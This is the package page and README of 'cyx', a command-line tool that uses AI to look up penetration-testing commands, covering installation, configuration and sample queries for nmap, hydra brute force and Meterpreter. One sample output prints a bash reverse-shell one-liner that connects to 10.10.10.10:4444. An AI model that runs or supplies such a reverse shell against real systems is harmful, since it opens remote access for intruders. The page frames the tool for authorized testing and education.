| Crates.io | cyx |
| lib.rs | cyx |
| version | 0.3.1 |
| created_at | 2025-10-31 15:25:27.830728+00 |
| updated_at | 2026-01-17 19:09:41.480665+00 |
| description | Fast, simple command-line security tool powered by AI. Install with cargo, setup in 30 seconds. |
| homepage | |
| repository | https://github.com/neur0map/cyx |
| max_upload_size | |
| id | 1910207 |
| size | 312,275 |
Fast, simple command-line security tool powered by AI. Install with cargo, setup in 30 seconds.
cargo install cyx + 30-second wizardcargo install cyx
cyx setup
That's it! The setup wizard will:
# Install
cargo install cyx
# Setup (30 seconds)
cyx setup
# Your first query
cyx "how to list files with hidden files in linux"
# That's it!
# Quick command lookup
cyx "reverse shell one liner"
cyx "hydra ssh brute force"
# Learn mode with detailed explanations
cyx --learn "metasploit meterpreter"
cyx -l "nmap service detection"
-l, --learn Educational mode with detailed breakdowns
-q, --quiet Minimal output (response only, no formatting)
-v, --verbose Detailed progress information
--no-tty Disable TTY features for scripting/testing
cyx config show # View current config
cyx config set provider perplexity # Change provider
cyx setup # Re-run setup wizard
Config file: ~/.config/cyx/config.toml
[ RESPONSE ]
```bash
nmap -sS <target>
[ SOURCES ] Provider: Perplexity (sonar-pro) Search: Yes (performed web search)
Links:
### Learn Mode
```bash
cyx --learn "nmap stealth scan"
Provides detailed explanations with flag breakdowns, protocol details, and alternatives.
$ cyx -q "reverse shell bash"
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
~/.config/cyx/config.tomlNormal mode prioritizes executable commands with brief explanations. Learn mode provides detailed educational content with examples and alternatives.
If you encounter issues, run:
cyx doctor
For detailed troubleshooting, see Installation Guide.
For authorized security testing, educational purposes, and defensive research only.
This tool is designed for:
Always obtain explicit permission before testing systems you don't own.
MIT License - See LICENSE for details.